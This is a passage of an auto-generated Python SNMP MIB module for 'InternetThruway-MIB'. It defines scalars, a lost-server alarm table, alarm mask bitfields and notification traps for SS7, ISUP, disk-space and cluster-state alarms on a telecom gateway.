cplxMateEthernetIP = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 8), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateEthernetIP.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateEthernetIP.setDescription(' The EthernetIP attribute value of the mate node.')
cplxMateOperationalState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateOperationalState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateOperationalState.setDescription(' The OperationalState of the mate node. Possible values are: UNKNOWN, ENABLED, ENABLED_NETDSC, ENABLED_NETPAR, DISABLED ')
cplxMateStandbyState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 10), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateStandbyState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateStandbyState.setDescription(' The StandbyState attribute value of the mate node. Possible values are: UNKNOWN, HOT_STANDBY, COLD_STANDBY, WARM_STANDBY, PROVIDING_SERVICE ')
cplxMateAvailabilityState = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 11), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxMateAvailabilityState.setStatus('mandatory')
if mibBuilder.loadTexts: cplxMateAvailabilityState.setDescription(' The AvailabilityState attribute value of the mate node. Possible values are: UNKNOWN, AVAILABLE, DEGRADED, OFFLINE ')
cplxAlarmStatus = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 22, 12), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cplxAlarmStatus.setStatus('mandatory')
if mibBuilder.loadTexts: cplxAlarmStatus.setDescription('This object indicates the alarm status of the CSG Complex. Possible status are: NORMAL, MAJOR, CRITICAL ')
lostServerAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1), )
if mibBuilder.loadTexts: lostServerAlarmTable.setStatus('mandatory')
if mibBuilder.loadTexts: lostServerAlarmTable.setDescription('')
lostServerAlarmTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1), ).setIndexNames((0, "InternetThruway-MIB", "lsIndex"))
if mibBuilder.loadTexts: lostServerAlarmTableEntry.setStatus('mandatory')
if mibBuilder.loadTexts: lostServerAlarmTableEntry.setDescription('This object defines a row within the Lost Server Alarm Table. A row can be uniquely identified with the row index.')
lsIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: lsIndex.setStatus('mandatory')
if mibBuilder.loadTexts: lsIndex.setDescription('Identifies the row number in the table.')
lsKey = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsKey.setStatus('mandatory')
if mibBuilder.loadTexts: lsKey.setDescription('Unique identifier for the alarm.')
lsIPAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: lsIPAddress.setDescription('This object identifies the IP Address of the machine which is lost.')
lsName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 4), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsName.setStatus('mandatory')
if mibBuilder.loadTexts: lsName.setDescription('The configured name associated with the IP Address of the machine which sent the alarm.')
lsTimeStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 14, 2, 5, 1, 1, 5), TimeString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: lsTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: lsTimeStamp.setDescription('Indicates the time of the alarm.')
alarmMaskInt1 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 1), Gauge32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alarmMaskInt1.setStatus('mandatory')
if mibBuilder.loadTexts: alarmMaskInt1.setDescription('The value of this bit mask reflects the current filtering policy of CSG events and alarms. Management stations which wish to not receive certain events or alarm types from the CSG can modify this value as needed. Note, however, that changes in the filtration policy affect what is received by all management stations. Initially, the bit mask is set so that all bits are in a false state. Each bit in a true state reflects a currently filtered event, alarm, or alarm type. The actual bit position meanings are given below. Bit 0 is LSB. Bits 0 = Generic Normal Alarm 1 = Generic Warning Alarm 2 = Generic Minor Alarm 3 = Generic Major Alarm 4 = Generic Critical Alarm 5 = Partition Space Alarm 6 = Home Gateway Failure Alarm 7 = Component Not In Provisioned State Alarm 8 = Component Debug On Alarm 9 = Component Multiple Restart Alarm 10 = Component Restart Warning 11 = NAS Registration Failure Warning 12 = NAS Failure Alarm 13 = File Deletion Warning 14 = File Backup Warning 15 = Sysman Restart Warning 16 = File Access Warning 17 = Home Gateway/NAS Provisioning Mismatch Warning 18 = SS7 Link Failure Alarm 19 = SS7 Link Congestion Alarm 20 = ISUP Failure Alarm 21 = ISUP Congestion Alarm 22 = SS7 FEP Congestion Alarm 23 = SS7 BEP Congestion Alarm 24 = High Availability Peer Contact Lost Alarm 25 = SS7 MTP3 Congestion Alarm 26 = SS7 MTP2 Trunk Failure Alarm 27 = SS7 Linkset Failure Alarm 28 = SS7 Destination Inaccessible Alarm 29 = SS7 Destination Congested Alarm 30 = SS7 Link Alignment Failure Alarm ')
alarmStatusInt1 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmStatusInt1.setStatus('mandatory')
if mibBuilder.loadTexts: alarmStatusInt1.setDescription('The value of this bit mask indicates that current status of CSG component alarms. Each components is represented by a single bit within the range occupied by each component alarm type. Each bit in a true state reflects a currently raised alarm. The actual bit position meanings are given below. Bit 0 is the LSB. Bits 0-15 = Component Not In Provisioned State Alarm 16-31 = Component Multi Restart Alarm ')
alarmStatusInt2 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmStatusInt2.setStatus('mandatory')
if mibBuilder.loadTexts: alarmStatusInt2.setDescription('The value of this bit mask indicates the current status of active CSG alarms. Component-related alarms occupy a range of bits: each bit within that range represents the alarm status for a particular component. Each bit in a true state reflects a currently raised alarm. The actual bit position meanings are given below. Bit 0 is the LSB. Bits 0-15 = Component Debug On Alarm 16-23 = Partition Space Alarm 24 = Home Gateway Failure Alarm 25 = NAS Failure Alarm 26 = SS7 Link Failure Alarm 27 = SS7 Link Congestion Alarm 28 = ISUP Failure Alarm 29 = ISUP Congestion Alarm 30 = High Availability Peer Contact Lost Alarm 31 = SS7 MTP3 Congestion Alarm ')
alarmStatusInt3 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: alarmStatusInt3.setStatus('mandatory')
if mibBuilder.loadTexts: alarmStatusInt3.setDescription('The value of this bit mask indicates the current status of active CSG alarms. Each bit in a true state reflects a currently raised alarm. The actual bit position meanings are given below. Bit 0 is the LSB. Bits 0 = SS7 MTP2 Trunk Failure Alarm 1 = SS7 Linkset Failure Alarm 2 = SS7 Destination Inaccessible Alarm 3 = SS7 Destination Congestion Alarm 4 = SS7 Link Alignment Failure Alarm 5 = CSG Complex Status Alarm 6 = External Ethernet Alarm ')
alarmMaskInt2 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 4, 5), Gauge32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alarmMaskInt2.setStatus('mandatory')
if mibBuilder.loadTexts: alarmMaskInt2.setDescription('The value of this bit mask reflects the current additional filtering policy of CSG events and alarms. Management stations which wish to not receive certain events or alarm types from the CSG can modify this value as needed. Note, however, that changes in the filtration policy affect what is received by all management stations. Initially, the bit mask is set so that all bits are in a false state. Each bit in a true state reflects a currently filtered event, alarm, or alarm type. The actual bit position meanings are given below. Bit 0 is LSB. Bits 0 = External Ethernet Alarm 1 = Cluster Information retrieval Alarm ')
trapCompName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 1), DisplayString())
if mibBuilder.loadTexts: trapCompName.setStatus('mandatory')
if mibBuilder.loadTexts: trapCompName.setDescription('OID for the Component name.')
trapFileName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 2), DisplayString())
if mibBuilder.loadTexts: trapFileName.setStatus('mandatory')
if mibBuilder.loadTexts: trapFileName.setDescription('OID for file Name.')
trapDate = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 3), TimeString())
if mibBuilder.loadTexts: trapDate.setStatus('mandatory')
if mibBuilder.loadTexts: trapDate.setDescription('OID for the date.')
trapGenericStr1 = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 4), DisplayString())
if mibBuilder.loadTexts: trapGenericStr1.setStatus('mandatory')
if mibBuilder.loadTexts: trapGenericStr1.setDescription('OID for the generic data.')
trapIdKey = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 5), Integer32())
if mibBuilder.loadTexts: trapIdKey.setStatus('mandatory')
if mibBuilder.loadTexts: trapIdKey.setDescription('OID for the identification key.')
trapIPAddress = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 6), IpAddress())
if mibBuilder.loadTexts: trapIPAddress.setStatus('mandatory')
if mibBuilder.loadTexts: trapIPAddress.setDescription('OID for IP address.')
trapName = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 7), DisplayString())
if mibBuilder.loadTexts: trapName.setStatus('mandatory')
if mibBuilder.loadTexts: trapName.setDescription('OID for configured name associated with an IpAddress.')
trapTimeStamp = MibScalar((1, 3, 6, 1, 4, 1, 562, 14, 2, 3, 8), DisplayString())
if mibBuilder.loadTexts: trapTimeStamp.setStatus('mandatory')
if mibBuilder.loadTexts: trapTimeStamp.setDescription('Indicates the time at which the alarm occurred.')
diskSpaceClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1001)).setObjects(("InternetThruway-MIB", "partitionSpaceKey"), ("InternetThruway-MIB", "partitionIndex"), ("InternetThruway-MIB", "partitionName"), ("InternetThruway-MIB", "partitionPercentFull"), ("InternetThruway-MIB", "partitionSpaceTimeStamp"))
if mibBuilder.loadTexts: diskSpaceClear.setDescription('The Trap generated when a disk partition has a space increase after a previously sent DiskSpaceAlarm.')
diskSpaceAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1004)).setObjects(("InternetThruway-MIB", "partitionSpaceKey"), ("InternetThruway-MIB", "partitionIndex"), ("InternetThruway-MIB", "partitionName"), ("InternetThruway-MIB", "partitionPercentFull"), ("InternetThruway-MIB", "partitionSpaceTimeStamp"))
if mibBuilder.loadTexts: diskSpaceAlarm.setDescription('The Trap generated when a disk partition is running out of space provisioned state.')
etherCardTrapClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1011))
if mibBuilder.loadTexts: etherCardTrapClear.setDescription(' The Trap generated when the external ethernet card becomes available.')
etherCardTrapMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1014))
if mibBuilder.loadTexts: etherCardTrapMajor.setDescription('The Trap generated when the external ethernet card is down.')
etherCardTrapCritical = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,1015))
if mibBuilder.loadTexts: etherCardTrapCritical.setDescription('The Trap generated when the external ethernet card is down.')
compDebugOff = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2001)).setObjects(("InternetThruway-MIB", "compDebugKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compDebugTimeStamp"))
if mibBuilder.loadTexts: compDebugOff.setDescription('The Trap generated when a Component turns off its debug info.')
compDebugOn = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2002)).setObjects(("InternetThruway-MIB", "compDebugKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compDebugTimeStamp"))
if mibBuilder.loadTexts: compDebugOn.setDescription('The Trap generated when a Component turns on its debug info.')
compStateClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2011)).setObjects(("InternetThruway-MIB", "compProvStateKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compProvStateStatus"), ("InternetThruway-MIB", "compSecsInCurrentState"), ("InternetThruway-MIB", "compProvStateTimeStamp"))
if mibBuilder.loadTexts: compStateClear.setDescription('The Trap generated when a component goes to its provisioned states after a CompStatusAlarm trap has been sent.')
compStateAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2014)).setObjects(("InternetThruway-MIB", "compProvStateKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compProvStateStatus"), ("InternetThruway-MIB", "compSecsInCurrentState"), ("InternetThruway-MIB", "compProvStateTimeStamp"))
if mibBuilder.loadTexts: compStateAlarm.setDescription("The Trap generated when a component is not in it's provisioned state.")
restartStateClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2021)).setObjects(("InternetThruway-MIB", "compRestartKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compRestartStatus"), ("InternetThruway-MIB", "compRestartTimeStamp"))
if mibBuilder.loadTexts: restartStateClear.setDescription('The Trap generated when a component goes to its provisioned states after a RestartStateAlarm trap has been sent.')
restartStateAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,2024)).setObjects(("InternetThruway-MIB", "compRestartKey"), ("InternetThruway-MIB", "componentIndex"), ("InternetThruway-MIB", "componentName"), ("InternetThruway-MIB", "compRestartStatus"), ("InternetThruway-MIB", "compRestartTimeStamp"))
if mibBuilder.loadTexts: restartStateAlarm.setDescription('The Trap generated when a component restarts repeatedly.')
ss7LinkFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3004)).setObjects(("InternetThruway-MIB", "lfIndex"), ("InternetThruway-MIB", "lfKey"), ("InternetThruway-MIB", "lfIPAddress"), ("InternetThruway-MIB", "lfLinkCode"), ("InternetThruway-MIB", "lfName"), ("InternetThruway-MIB", "lfCardId"), ("InternetThruway-MIB", "lfLinkSet"), ("InternetThruway-MIB", "lfTimeStamp"))
if mibBuilder.loadTexts: ss7LinkFailureAlarm.setDescription('Trap generated for an SS7 link failure.')
ss7LinkFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3001)).setObjects(("InternetThruway-MIB", "lfIndex"), ("InternetThruway-MIB", "lfKey"), ("InternetThruway-MIB", "lfIPAddress"), ("InternetThruway-MIB", "lfLinkCode"), ("InternetThruway-MIB", "lfName"), ("InternetThruway-MIB", "lfCardId"), ("InternetThruway-MIB", "lfLinkSet"), ("InternetThruway-MIB", "lfTimeStamp"))
if mibBuilder.loadTexts: ss7LinkFailureClear.setDescription('Trap generated to clear an SS7 link failure.')
ss7LinkCongestionAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3012)).setObjects(("InternetThruway-MIB", "lcIndex"), ("InternetThruway-MIB", "lcKey"), ("InternetThruway-MIB", "lcIPAddress"), ("InternetThruway-MIB", "lcLinkCode"), ("InternetThruway-MIB", "lcName"), ("InternetThruway-MIB", "lcCardId"), ("InternetThruway-MIB", "lcLinkSet"), ("InternetThruway-MIB", "lcTimeStamp"))
if mibBuilder.loadTexts: ss7LinkCongestionAlarm.setDescription('Trap generated for congestion on an SS7 Link.')
ss7LinkCongestionClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3011)).setObjects(("InternetThruway-MIB", "lcIndex"), ("InternetThruway-MIB", "lcKey"), ("InternetThruway-MIB", "lcIPAddress"), ("InternetThruway-MIB", "lcLinkCode"), ("InternetThruway-MIB", "lcName"), ("InternetThruway-MIB", "lcCardId"), ("InternetThruway-MIB", "lcLinkSet"), ("InternetThruway-MIB", "lcTimeStamp"))
if mibBuilder.loadTexts: ss7LinkCongestionClear.setDescription('Trap generated to indicate there is no longer congestion on an SS7 link.')
ss7ISUPFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3025)).setObjects(("InternetThruway-MIB", "ifIndex"), ("InternetThruway-MIB", "ifKey"), ("InternetThruway-MIB", "ifIPAddress"), ("InternetThruway-MIB", "ifName"), ("InternetThruway-MIB", "ifTimeStamp"))
if mibBuilder.loadTexts: ss7ISUPFailureAlarm.setDescription('Trap generated to indicate ISUP failure.')
ss7ISUPFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3021)).setObjects(("InternetThruway-MIB", "ifIndex"), ("InternetThruway-MIB", "ifKey"), ("InternetThruway-MIB", "ifIPAddress"), ("InternetThruway-MIB", "ifName"), ("InternetThruway-MIB", "ifTimeStamp"))
if mibBuilder.loadTexts: ss7ISUPFailureClear.setDescription('Trap generated to clear an ISUP failure alarm.')
ss7ISUPCongestionAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3033)).setObjects(("InternetThruway-MIB", "icIndex"), ("InternetThruway-MIB", "icKey"), ("InternetThruway-MIB", "icIPAddress"), ("InternetThruway-MIB", "icCongestionLevel"), ("InternetThruway-MIB", "icName"), ("InternetThruway-MIB", "icTimeStamp"))
if mibBuilder.loadTexts: ss7ISUPCongestionAlarm.setDescription('Trap generated to indicate congestion with the ISUP protocol stack.')
ss7ISUPCongestionClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3031)).setObjects(("InternetThruway-MIB", "icIndex"), ("InternetThruway-MIB", "icKey"), ("InternetThruway-MIB", "icIPAddress"), ("InternetThruway-MIB", "icCongestionLevel"), ("InternetThruway-MIB", "icName"), ("InternetThruway-MIB", "icTimeStamp"))
if mibBuilder.loadTexts: ss7ISUPCongestionClear.setDescription('Trap generated to indicate there is no longer congestion with the ISUP protocol stack.')
ss7FEPCongestionWarning = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3042)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapIPAddress"), ("InternetThruway-MIB", "trapName"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: ss7FEPCongestionWarning.setDescription('Notification trap generated to indicate congestion encountered by the SS7 front-end process.')
ss7BEPCongestionWarning = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3052)).setObjects(("InternetThruway-MIB", "trapIdKey"), ("InternetThruway-MIB", "trapIPAddress"), ("InternetThruway-MIB", "trapName"), ("InternetThruway-MIB", "trapTimeStamp"))
if mibBuilder.loadTexts: ss7BEPCongestionWarning.setDescription('Notification trap generated to indicate congestion encountered by the SS7 back-end process.')
ss7MTP3CongestionMinor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3063)).setObjects(("InternetThruway-MIB", "mtp3Index"), ("InternetThruway-MIB", "mtp3Key"), ("InternetThruway-MIB", "mtp3IPAddress"), ("InternetThruway-MIB", "mtp3Name"), ("InternetThruway-MIB", "mtp3TimeStamp"))
if mibBuilder.loadTexts: ss7MTP3CongestionMinor.setDescription('Trap generated for MTP3 congestion.')
ss7MTP3CongestionMajor = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3064)).setObjects(("InternetThruway-MIB", "mtp3Index"), ("InternetThruway-MIB", "mtp3Key"), ("InternetThruway-MIB", "mtp3IPAddress"), ("InternetThruway-MIB", "mtp3Name"), ("InternetThruway-MIB", "mtp3TimeStamp"))
if mibBuilder.loadTexts: ss7MTP3CongestionMajor.setDescription('Trap generated for MTP3 congestion.')
ss7MTP3CongestionCritical = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3065)).setObjects(("InternetThruway-MIB", "mtp3Index"), ("InternetThruway-MIB", "mtp3Key"), ("InternetThruway-MIB", "mtp3IPAddress"), ("InternetThruway-MIB", "mtp3Name"), ("InternetThruway-MIB", "mtp3TimeStamp"))
if mibBuilder.loadTexts: ss7MTP3CongestionCritical.setDescription('Trap generated for MTP3 congestion.')
ss7MTP3CongestionClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3061)).setObjects(("InternetThruway-MIB", "mtp3Index"), ("InternetThruway-MIB", "mtp3Key"), ("InternetThruway-MIB", "mtp3IPAddress"), ("InternetThruway-MIB", "mtp3Name"), ("InternetThruway-MIB", "mtp3TimeStamp"))
if mibBuilder.loadTexts: ss7MTP3CongestionClear.setDescription('Trap generated to indicate there is no longer MTP3 congestion.')
ss7MTP2TrunkFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3075)).setObjects(("InternetThruway-MIB", "mtp2Index"), ("InternetThruway-MIB", "mtp2Key"), ("InternetThruway-MIB", "mtp2IPAddress"), ("InternetThruway-MIB", "mtp2Name"), ("InternetThruway-MIB", "mtp2CardId"), ("InternetThruway-MIB", "mtp2AlarmCondition"), ("InternetThruway-MIB", "mtp2TimeStamp"))
if mibBuilder.loadTexts: ss7MTP2TrunkFailureAlarm.setDescription('Trap generated to indicate an MTP2 trunk failure condition.')
ss7MTP2TrunkFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3071)).setObjects(("InternetThruway-MIB", "mtp2Index"), ("InternetThruway-MIB", "mtp2Key"), ("InternetThruway-MIB", "mtp2IPAddress"), ("InternetThruway-MIB", "mtp2Name"), ("InternetThruway-MIB", "mtp2CardId"), ("InternetThruway-MIB", "mtp2TimeStamp"))
if mibBuilder.loadTexts: ss7MTP2TrunkFailureClear.setDescription('Trap generated to clear an MTP2 trunk failure alarm.')
ss7LinksetFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3085)).setObjects(("InternetThruway-MIB", "lsFailureIndex"), ("InternetThruway-MIB", "lsFailureKey"), ("InternetThruway-MIB", "lsFailureIPAddress"), ("InternetThruway-MIB", "lsFailureName"), ("InternetThruway-MIB", "lsFailurePointcode"), ("InternetThruway-MIB", "lsFailureTimeStamp"))
if mibBuilder.loadTexts: ss7LinksetFailureAlarm.setDescription('Trap generated to indicate a linkset failure.')
ss7LinksetFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3081)).setObjects(("InternetThruway-MIB", "lsFailureIndex"), ("InternetThruway-MIB", "lsFailureKey"), ("InternetThruway-MIB", "lsFailureIPAddress"), ("InternetThruway-MIB", "lsFailureName"), ("InternetThruway-MIB", "lsFailurePointcode"), ("InternetThruway-MIB", "lsFailureTimeStamp"))
if mibBuilder.loadTexts: ss7LinksetFailureClear.setDescription('Trap generated to clear a linkset failure alarm.')
ss7DestinationInaccessible = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3092)).setObjects(("InternetThruway-MIB", "destInaccessIndex"), ("InternetThruway-MIB", "destInaccessKey"), ("InternetThruway-MIB", "destInaccessIPAddress"), ("InternetThruway-MIB", "destInaccessName"), ("InternetThruway-MIB", "destInaccessPointcode"), ("InternetThruway-MIB", "destInaccessTimeStamp"))
if mibBuilder.loadTexts: ss7DestinationInaccessible.setDescription('Trap generated to indicate that a signalling destination is inaccessible. A destination is considered inaccessible once Transfer Prohibited (TFP) messages are received which indicate that the route to that destination is prohibited.')
ss7DestinationAccessible = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3091)).setObjects(("InternetThruway-MIB", "destInaccessIndex"), ("InternetThruway-MIB", "destInaccessKey"), ("InternetThruway-MIB", "destInaccessIPAddress"), ("InternetThruway-MIB", "destInaccessName"), ("InternetThruway-MIB", "destInaccessPointcode"), ("InternetThruway-MIB", "destInaccessTimeStamp"))
if mibBuilder.loadTexts: ss7DestinationAccessible.setDescription('Trap generated to clear a destination inacessible alarm. An inaccessible signalling destination is considered accessible once Transfer Allowed (TFA) messages are sent along its prohibited signalling routes.')
ss7DestinationCongestedAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3103)).setObjects(("InternetThruway-MIB", "destCongestIndex"), ("InternetThruway-MIB", "destCongestKey"), ("InternetThruway-MIB", "destCongestIPAddress"), ("InternetThruway-MIB", "destCongestName"), ("InternetThruway-MIB", "destCongestPointcode"), ("InternetThruway-MIB", "destCongestCongestionLevel"), ("InternetThruway-MIB", "destCongestTimeStamp"))
if mibBuilder.loadTexts: ss7DestinationCongestedAlarm.setDescription('Trap generated to indicate congestion at an SS7 destination.')
ss7DestinationCongestedClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3101)).setObjects(("InternetThruway-MIB", "destCongestIndex"), ("InternetThruway-MIB", "destCongestKey"), ("InternetThruway-MIB", "destCongestIPAddress"), ("InternetThruway-MIB", "destCongestName"), ("InternetThruway-MIB", "destCongestPointcode"), ("InternetThruway-MIB", "destCongestCongestionLevel"), ("InternetThruway-MIB", "destCongestTimeStamp"))
if mibBuilder.loadTexts: ss7DestinationCongestedClear.setDescription('Trap generated to indicate that there is no longer congestion at an SS7 destination.')
ss7LinkAlignmentFailureAlarm = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3114)).setObjects(("InternetThruway-MIB", "linkAlignIndex"), ("InternetThruway-MIB", "linkAlignKey"), ("InternetThruway-MIB", "linkAlignIPAddress"), ("InternetThruway-MIB", "linkAlignName"), ("InternetThruway-MIB", "linkAlignLinkCode"), ("InternetThruway-MIB", "linkAlignCardId"), ("InternetThruway-MIB", "linkAlignLinkSet"), ("InternetThruway-MIB", "linkAlignTimeStamp"))
if mibBuilder.loadTexts: ss7LinkAlignmentFailureAlarm.setDescription('Trap generated to indicate alignment failure on a datalink.')
ss7LinkAlignmentFailureClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,3111)).setObjects(("InternetThruway-MIB", "linkAlignIndex"), ("InternetThruway-MIB", "linkAlignKey"), ("InternetThruway-MIB", "linkAlignIPAddress"), ("InternetThruway-MIB", "linkAlignName"), ("InternetThruway-MIB", "linkAlignLinkCode"), ("InternetThruway-MIB", "linkAlignCardId"), ("InternetThruway-MIB", "linkAlignLinkSet"), ("InternetThruway-MIB", "linkAlignTimeStamp"))
if mibBuilder.loadTexts: ss7LinkAlignmentFailureClear.setDescription('Trap generated to clear a datalink alignment failure alarm.')
ncLostServerTrap = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4014)).setObjects(("InternetThruway-MIB", "lsIndex"), ("InternetThruway-MIB", "lsKey"), ("InternetThruway-MIB", "lsName"), ("InternetThruway-MIB", "lsIPAddress"), ("InternetThruway-MIB", "lsTimeStamp"))
if mibBuilder.loadTexts: ncLostServerTrap.setDescription('This trap is generated when the CSG loses contact with its peer in the cluster. The variables in this trap identify the server that has been lost. The originator of this trap is implicitly defined.')
ncFoundServerTrap = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4011)).setObjects(("InternetThruway-MIB", "lsIndex"), ("InternetThruway-MIB", "lsKey"), ("InternetThruway-MIB", "lsName"), ("InternetThruway-MIB", "lsIPAddress"), ("InternetThruway-MIB", "lsTimeStamp"))
if mibBuilder.loadTexts: ncFoundServerTrap.setDescription('This trap is generated when the initially comes into contact with or regains contact with its peer in the cluster. The variables in this trap identify the server that has been found. The originator of this trap is implicitly defined.')
ncStateChangeTrap = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4022)).setObjects(("InternetThruway-MIB", "ncEthernetName"), ("InternetThruway-MIB", "ncEthernetIP"), ("InternetThruway-MIB", "ncOperationalState"), ("InternetThruway-MIB", "ncStandbyState"), ("InternetThruway-MIB", "ncAvailabilityState"))
if mibBuilder.loadTexts: ncStateChangeTrap.setDescription('This trap is generated when any of the state values change.')
csgComplexStateTrapClear = NotificationType((1, 3, 6, 1, 4, 1, 562, 14, 2, 3) + (0,4031)).setObjects(("InternetThruway-MIB", "cplxName"), ("InternetThruway-MIB", "cplxLocEthernetName"), ("InternetThruway-MIB", "cplxLocEthernetIP"), ("InternetThruway-MIB", "cplxLocOperationalState"), ("InternetThruway-MIB", "cplxLocStandbyState"), ("InternetThruway-MIB", "cplxLocAvailabilityState"), ("InternetThruway-MIB", "cplxMateEthernetName"), ("InternetThruway-MIB", "cplxMateEthernetIP"), ("InternetThruway-MIB", "cplxMateOperationalState"), ("InternetThruway-MIB", "cplxMateStandbyState"), ("InternetThruway-MIB", "cplxMateAvailabilityState"), ("InternetThruway-MIB", "cplxAlarmStatus"))
if mibBuilder.loadTexts: csgComplexStateTrapClear.setDescription('This trap is generated when any of the state values change Severity is determined only by the operational and standby states of both servers.')
